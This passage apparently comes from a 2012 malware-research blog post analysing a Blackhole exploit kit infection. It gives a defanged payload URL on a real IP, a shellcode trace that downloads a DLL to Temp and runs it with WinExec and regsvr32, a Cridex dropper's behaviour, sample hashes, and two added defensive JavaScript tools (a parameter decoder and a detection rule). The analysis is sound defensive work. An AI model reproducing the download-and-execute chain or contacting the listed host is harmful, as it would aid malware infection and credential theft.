↑It must've been copy-paster level work of malware retards :-) Well, the URL for the download payload is as per below:

h00p://203.80.16.81:8080/forum/links/column.php?vfg=30:1n:1i:1i:33&cacjp=2v:1k:1m:32:33:1k:1k:31:1j:1o&zbrybx=1h&gfh=xdoq&hsphg=edixgidl

Download proof:

--03:22:55-- h00p://203.80.16.81:8080/forum/links/column.php?vfg=30:1n:1i:1i:33&cacjp=2v:1k:1m:32:33:1k:1k:31:1j:1o&zbrybx=1h&gfh=xdoq&hsphg=edixgidl
Connecting to 203.80.16.81:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 122,727 (120K) [application/x-msdownload]
100%[====================================>] 122,727 108.68K/s
03:22:57 (108.52 KB/s) - `column.php@vfg=....' saved [122727/122727]

The shellcode API calls (kernel32.dll & urlmon.dll) used for the download are as below:

kernel32.VirtualProtect(lpAddress=0x4021be, dwSize=255)
kernel32.LoadLibraryA(lpFileName=urlmon)
kernel32.GetTempPathA(lpBuffer=0x22fa60, nBufferLength=248, [lpBuffer=C:\DOCUME~1\Administrator\LOCALS~1\Temp\])
urlmon.URLDownloadToFileA(pCaller=0, szURL=h00p://203.80.16.81:8080/forum/....., lpfnCB=0x0, szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll)
kernel32.WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
kernel32.WinExec(lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
kernel32.TerminateThread(dwExitCode=0)

So we saved the payload as wpbt0.dll and quickly examined it, with the results below... This malware drops the files below before doing a self-deletion:

C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\exp1.tmp
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\exp1.tmp.bat
C:\Documents and Settings\Administrator\Application Data\KB00695911.exe

Using CMD.EXE with the command below executed:

C:\WINDOWS\system32\cmd.exe
|
+->"C:\WINDOWS\system32\cmd.exe" /c "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\exp1.tmp.bat"

And the bat file will run the malware from the new location:

"C:\Documents and Settings\Administrator\Application Data\KB00695911.exe"

Explaining the executable API traces below:

Address: 0x403872 CreateRemoteThread(hProcess: 0x78, lpThreadAttributes: 0x0, dwStackSize: 0x0, lpStartAddress: 0x3ced50, lpParameter: 0x3c0000, dwCreationFlags: 0x0, lpThreadId: 0x0)

All of a sudden we saw the malicious processes below:

0x2b0 lsass.exe
0x6ec KB00085031.exe

From the previous findings, studying every malicious act of this binary, we know it is a trojan credential stealer, a Cridex variant.
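The manual decoding note above stops where the copy of x() was cut off, so here is an added example (not code from the original post or the kit) that makes the same decoding repeatable for proxy and IDS logs. encodeParam is a reconstruction that reproduces every sample pair the post gives ("c833f" ↔ "30:1n:1i:1i:33", "laa" ↔ "39:2v:2v", "9.1.0" ↔ "1o:1d:1g:1d:1f"): each character code written in base 33, tokens joined with ":". The radix is an assumption derived from those samples, not something the post states; the app.beep key the post derives belongs to the PDF stage and is not used here. decodeParam is the inverse, and decodeQuery applies it to a whole column.php query string, URL-decoding the %3A that wget writes into its saved file names.

```javascript
// Added example (not code from the original post): decoder for the
// colon-separated values built by the landing page's x() helper, such as
// "30:1n:1i:1i:33". The post's x() is cut off, so encodeParam is a
// reconstruction that reproduces every sample value the post gives; the
// base-33 radix is an assumption derived from those samples.

const RADIX = 33; // assumption: matches "c833f" -> "30:1n:1i:1i:33" etc.
const TOKEN_RE = /^[0-9a-w]+$/i; // the digits that are valid in base 33

function encodeParam(s) {
  const d = [];
  for (let i = 0; i < s.length; i++) d.push(s.charCodeAt(i).toString(RADIX));
  return d.join(':');
}

// Returns the decoded string, or null when any token is not a base-33
// number (such values use some other encoding, or are plain literals).
function decodeParam(v) {
  const tokens = v.split(':');
  if (!tokens.every(t => TOKEN_RE.test(t))) return null;
  return tokens.map(t => String.fromCharCode(parseInt(t, RADIX))).join('');
}

// Decode every value of a column.php-style query string. wget stores ":"
// as %3A in its saved file names, so each value is URL-decoded first.
function decodeQuery(url) {
  const q = url.split('?')[1] || '';
  const out = {};
  for (const pair of q.split('&')) {
    if (!pair) continue;
    const eq = pair.indexOf('=');
    const key = eq < 0 ? pair : pair.slice(0, eq);
    const raw = eq < 0 ? '' : decodeURIComponent(pair.slice(eq + 1));
    out[key] = { raw, decoded: decodeParam(raw) };
  }
  return out;
}

// The payload URL quoted in the post, kept defanged.
const PAYLOAD_URL = 'h00p://203.80.16.81:8080/forum/links/column.php'
  + '?vfg=30:1n:1i:1i:33&cacjp=2v:1k:1m:32:33:1k:1k:31:1j:1o'
  + '&zbrybx=1h&gfh=xdoq&hsphg=edixgidl';

for (const [k, v] of Object.entries(decodeQuery(PAYLOAD_URL))) {
  console.log(k, '=', v.raw, '->', v.decoded === null ? '(not base-33)' : v.decoded);
}
```

Applied to the payload URL, vfg decodes to "c833f" and cacjp to "a57ef55d49", the same two values the landing page sends as xrdbmuu and bugeh, so one request chain can be tied together across the three column.php fetches; zbrybx decodes to "2", while gfh and hsphg contain letters outside base 33 and are reported as not being in this encoding rather than as garbage characters.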
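The shellcode API trace above is a compact download-then-execute chain, and that chain is what a sandbox rule should key on rather than any single call. The code below is an added example, not code from the original post: it parses trace lines of the "module.Api(name=value, ...)" form shown above, remembers every local path written by URLDownloadToFileA, and reports when a later WinExec (or CreateProcess/ShellExecute) runs that same file, directly or through "regsvr32 -s". SAMPLE_TRACE is constructed from the calls quoted in the post with the URL kept defanged; the list of execution APIs is an assumption.

```javascript
// Added example (not from the original post): a rule over an API trace like
// the one above that reports the download-then-execute chain: a file written
// by URLDownloadToFileA into a Temp directory and then run by WinExec,
// directly or through "regsvr32 -s". SAMPLE_TRACE is constructed from the
// calls quoted in the post; the URL stays defanged as in the post.

const SAMPLE_TRACE = [
  'kernel32.VirtualProtect(lpAddress=0x4021be, dwSize=255)',
  'kernel32.LoadLibraryA(lpFileName=urlmon)',
  'kernel32.GetTempPathA(lpBuffer=0x22fa60, nBufferLength=248, [lpBuffer=C:\\DOCUME~1\\Administrator\\LOCALS~1\\Temp\\])',
  'urlmon.URLDownloadToFileA(pCaller=0, szURL=h00p://203.80.16.81:8080/forum/....., lpfnCB=0x0, szFileName=C:\\DOCUME~1\\Administrator\\LOCALS~1\\Temp\\wpbt0.dll)',
  'kernel32.WinExec(lpCmdLine=C:\\DOCUME~1\\Administrator\\LOCALS~1\\Temp\\wpbt0.dll, uCmdShow=0)',
  'kernel32.WinExec(lpCmdLine=regsvr32 -s C:\\DOCUME~1\\Administrator\\LOCALS~1\\Temp\\wpbt0.dll, uCmdShow=0)',
  'kernel32.TerminateThread(dwExitCode=0)',
];

// Parse "module.Api(name=value, name=value, [name=value])" into an object.
// Arguments are split only before a "name=" so values may contain commas.
function parseCall(line) {
  const m = /^(\w+)\.(\w+)\((.*)\)$/.exec(line.trim());
  if (!m) return null;
  const args = {};
  for (const part of m[3].split(/,\s+(?=\[?\w+=)/)) {
    const eq = part.indexOf('=');
    if (eq < 0) continue;
    const name = part.slice(0, eq).replace(/^\[/, '');
    args[name] = part.slice(eq + 1).replace(/\]$/, '');
  }
  return { module: m[1], api: m[2], args };
}

// Assumption: the process-creation APIs worth correlating with a download.
const EXEC_APIS = new Set(['WinExec', 'CreateProcessA', 'CreateProcessW', 'ShellExecuteA', 'ShellExecuteW']);

// Walk the trace in order; returns one finding string per suspicious event.
function detectDownloadExec(lines) {
  const findings = [];
  const downloaded = new Map(); // lower-cased local path -> source URL
  for (const call of lines.map(parseCall)) {
    if (!call) continue;
    if (/^URLDownloadToFile[AW]$/.test(call.api)) {
      const path = call.args.szFileName || '';
      downloaded.set(path.toLowerCase(), call.args.szURL || '');
      if (/\\temp\\/i.test(path)) {
        findings.push(`download into temp dir: ${path} <- ${call.args.szURL}`);
      }
    } else if (EXEC_APIS.has(call.api)) {
      const cmd = (call.args.lpCmdLine || call.args.lpCommandLine || call.args.lpFile || '').toLowerCase();
      for (const path of downloaded.keys()) {
        if (path && cmd.includes(path)) {
          const via = /\bregsvr32\b/.test(cmd) ? ' via regsvr32' : '';
          findings.push(`execution of downloaded file${via}: ${path}`);
        }
      }
    }
  }
  return findings;
}

for (const f of detectDownloadExec(SAMPLE_TRACE)) console.log(f);
```

On the sample trace this yields three findings: the download into the Temp directory, the direct WinExec of wpbt0.dll, and the regsvr32 -s registration of the same file, which is the DLL-payload pattern this kit's shellcode uses; a trace that only launches an existing program produces no finding.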
Samples downloads

Here is the picture of the captured payloads:

We share these samples for research/study purposes --->>[HERE]

VirusTotal detection ratio analysis

@unixfreaxjp ~/malware]$ date
Sun Nov 18 04:38:25 JST 2012
column.php ( 2/44) --> 09b4ceea8fd5e90eea21bc1e2c2892e4
sample.pdf (15/43) --> e2efc2bc128c7aa7643f025a68194a1e CVE-2009-0927
spn.jar ( 3/44) --> fbdf22bf32946676dcb1408208a24945 CVE-2012-5076
spn2.jar ( 3/44) --> e98cde0af1e59379e8aec2a7a813225f CVE-2012-4681 & CVE-2012-1723
wpbt0.dll ( 9/43) --> e673b7c943b7395cc9ad61a301652880
spn3.jar (15/43) --> 66c55d2cebc9d2d7b09a6e12b94fc1c9 CVE-2012-0507 & CVE-2012-4681
t.pdf (22/43) --> d1e2ff36a6c882b289d3b736d915a6cc CVE-2009-2990

References of CVE exploits used
MSFT-MMPC: A technical analysis on new Java vulnerability (CVE-2012-5076) -->[CLICK]
Immunity Products: Java 0day analysis (CVE-2012-4681) -->[CLICK]
EXPLOIT-DB: Adobe Acrobat/Reader Collab getIcon Universal Exploit (CVE-2009-0927) -->[CLICK]
Symantec: An Examination of Java Vulnerability CVE-2012-1723 -->[CLICK]
MSFT-MMPC: The rise of a new Java vulnerability - CVE-2012-1723 -->[CLICK]

Other NEW References of PluginDetect BHEK 0.7.9 (The Non-Obfuscated JavaScript Version)

Sophos: Blackhole confusion. Custom builds or copycats? -->[HERE]
F-Secure: Cool-er Than Blackhole? -->[HERE]
Malware Don't Need Coffee: CVE-2012-5076 - Massively adopted - BHEK update to 2.0.1 -->[HERE]

[NEW!] Additional Info on PluginDetect BHEK 0.7.9 Obfuscated Version
We also detected an obfuscated version of PluginDetect BHEK 0.7.9. The sources are 2 (two) spam attachment HTML files, as per the pics below:

*) Thanks to Officer Ken Pryor (@KDPryor) for contributing the samples.

The attached HTML file has code leading to the obfuscated PluginDetect 0.7.9. Both spams have the same obfuscation code:

We can decode this code to find the PluginDetect URLs as below:

The column.php is the obfuscated version of PluginDetect 0.7.9. It uses a new obfuscation pattern; we decoded it here -->>[PASTEBIN] ↑with step-by-step text guidance on how to do it.

The components of BHEK2 with obfuscated PluginDetect 0.7.9 are as usual:

↑These are the samples captured from that host (hamasutra.ru). For research purposes, here are all samples of this infection -->>[CLICK]

Furthermore, hamasutra.ru has some IPs & DNS, see --->>[PASTEBIN]; those IPs have a LONG history of BHEK in the past, up to 30 days -->>[PASTEBIN]

In case you are wondering about detection rates (CVE data is as per the list above):

Email attached HTML1 (21/43) fa7b41a96360c09baad5b8fa210e6fae
Email attached HTML2 (11/43) 9d3ce7441ea6cffcc3aeee80238357fe
infector.pdf (21/43) 2c325f278f741e8b4cfe66af87b96c40
↑This PDF decoding guide is here -->>[PASTEBIN]
spn3.jar (19/41) 66c55d2cebc9d2d7b09a6e12b94fc1c9
spn2.jar (3/43) 4ad0cb8901186409045bf2961f1cad26
spn.jar (3/41) 3eb329162cbf4f1538d7d0f1a23d391c
t.pdf (21/43) d1e2ff36a6c882b289d3b736d915a6cc
..And the obfuscated PluginDetect 0.7.9 /column.php (4/42) ba76833dc28ad027d0ad148351c9b167
#MalwareMustDie!